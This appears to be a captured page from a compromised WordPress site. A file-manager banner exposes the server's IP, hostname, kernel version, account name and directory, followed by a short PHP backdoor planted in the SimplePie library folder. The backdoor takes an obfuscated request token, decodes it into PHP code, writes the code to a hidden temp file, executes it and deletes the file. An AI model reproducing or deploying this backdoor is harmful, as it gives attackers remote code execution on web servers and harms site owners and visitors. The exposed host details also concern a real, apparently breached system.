| Server IP : 198.38.94.67 / Your IP : 216.73.217.178 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/SimplePie/library/ |
Upload File : |
<?php
if(!empty($_REQUEST["tkn"])){
$entry = $_REQUEST["tkn"];
$entry = explode ( "." , $entry ) ;
$property_set = '';
$salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen($salt);
$v = 0;
while ($v < count($entry)) {
$v6 = $entry[$v];
$chS = ord($salt[$v % $sLen]);
$dec = ((int)$v6 - $chS - ($v % 10)) ^ 41;
$property_set .= chr($dec);
$v++;
}
$resource = array_filter([sys_get_temp_dir(), "/tmp", "/var/tmp", getenv("TMP"), getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm"]);
$symbol = 0;
do {
$component = $resource[$symbol] ?? null;
if ($symbol >= count($resource)) break;
if (is_dir($component) && is_writable($component)) {
$mrk = str_replace("{var_dir}", $component, "{var_dir}/.sym");
if (file_put_contents($mrk, $property_set)) {
include $mrk;
@unlink($mrk);
die();
}
}
$symbol++;
} while (true);
}